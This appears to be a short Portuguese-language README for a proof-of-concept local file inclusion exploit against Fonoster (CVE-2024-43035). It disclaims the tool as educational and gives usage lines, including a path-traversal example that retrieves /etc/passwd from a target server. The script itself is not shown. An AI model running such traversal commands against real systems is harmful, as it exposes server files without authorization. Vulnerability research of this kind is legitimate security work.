
Exploit de prova de conceito para a vulnerabilidade de LFI do Fonoster (CVE-2024-43035)
Este repositório contém um script de Prova de Conceito (PoC) que demonstra uma vulnerabilidade de Inclusão de Arquivo Local no Fonoster. Esta ferramenta é apenas para fins educacionais e de teste autorizado.
Para recuperar um arquivo local do servidor:
python3 fonoster_lfi_poc.py --url <fonoster_server_url> --path <file_path_to_retrieve>
Exemplo:
python3 fonoster_lfi_poc.py --url http://example.com --path "../../../etc/passwd"